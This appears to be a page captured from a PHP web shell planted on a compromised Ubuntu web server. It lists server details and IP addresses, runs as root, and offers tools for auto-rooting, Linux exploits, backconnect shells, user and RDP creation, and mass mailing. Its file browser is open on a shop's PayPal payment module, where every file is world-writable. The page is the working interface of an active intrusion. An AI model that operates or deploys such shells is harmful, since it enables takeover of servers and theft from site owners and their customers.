Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
tienda /
modules /
paypal /
[ HOME SHELL ]
Name
Size
Permission
Action
_dev
[ DIR ]
drwxrwxrwx
classes
[ DIR ]
drwxrwxrwx
controllers
[ DIR ]
drwxrwxrwx
sdk
[ DIR ]
drwxrwxrwx
services
[ DIR ]
drwxrwxrwx
smarty
[ DIR ]
drwxrwxrwx
translations
[ DIR ]
drwxrwxrwx
upgrade
[ DIR ]
drwxrwxrwx
vendor
[ DIR ]
drwxrwxrwx
views
[ DIR ]
drwxrwxrwx
.editorconfig
172
B
-rwxrwxrwx
.eslintrc.js
913
B
-rwxrwxrwx
.stylelintrc
428
B
-rwxrwxrwx
LICENSE
10.12
KB
-rwxrwxrwx
Readme.md
4.55
KB
-rwxrwxrwx
browserlist
71
B
-rwxrwxrwx
config_es.xml
743
B
-rwxrwxrwx
index.php
1.28
KB
-rwxrwxrwx
logo.png
11.01
KB
-rwxrwxrwx
package-lock.json
404.14
KB
-rwxrwxrwx
package.json
1.69
KB
-rwxrwxrwx
paypal.php
78.27
KB
-rwxrwxrwx
postcss.config.js
124
B
-rwxrwxrwx
webpack.config.js
2.35
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "paypal", "version": "4.5.0", "description": "PayPal & Braintree official Module", "directories": { "doc": "202/doc" }, "scripts": { "watch": "webpack --mode development --colors --devtool source-map --hide-modules -w", "build": "webpack --mode production --colors --devtool source-map --progress -p", "doc-build": "stylemark -i 202/doc -o 202/build/doc -c 202/doc/config.yml", "doc-watch": "stylemark -i 202/doc -o 202/build/doc -c 202/doc/config.yml -w -b", "lint-css": "stylelint \"_dev/scss/**/*.scss\" --cache --cache-location .cache/.stylelintcache --fix", "lint-css-fix": "stylelint \"_dev/scss/**/*.scss\" --cache --cache-location .cache/.stylelintcache --fix" }, "repository": { "type": "git", "url": "https://github.com/202-ecommerce/paypal/" }, "keywords": [ "PayPal", "Braintree" ], "homepage": "https://github.com/", "devDependencies": { "@babel/core": "^7.4.5", "@babel/plugin-proposal-object-rest-spread": "^7.4.4", "@babel/plugin-transform-destructuring": "^7.4.4", "@babel/preset-env": "^7.4.5", "autoprefixer": "^9.5.1", "babel-loader": "^8.0.6", "babel-preset-env": "^1.7.0", "css-loader": "^2.1.1", "eslint": "^5.16.0", "mini-css-extract-plugin": "^0.7.0", "node-sass": "^4.12.0", "postcss-loader": "^3.0.0", "sass-loader": "^7.1.0", "style-loader": "^0.23.1", "stylelint": "^10.0.1", "stylelint-config-standard": "^18.3.0", "stylelint-config-twbs-bootstrap": "^0.3.1", "stylemark": "^3.0.3", "terser-webpack-plugin": "^1.3.0", "webpack": "^4.32.2", "webpack-cli": "^3.3.9", "webpack-fix-style-only-entries": "^0.2.2" }, "dependencies": {} }
Close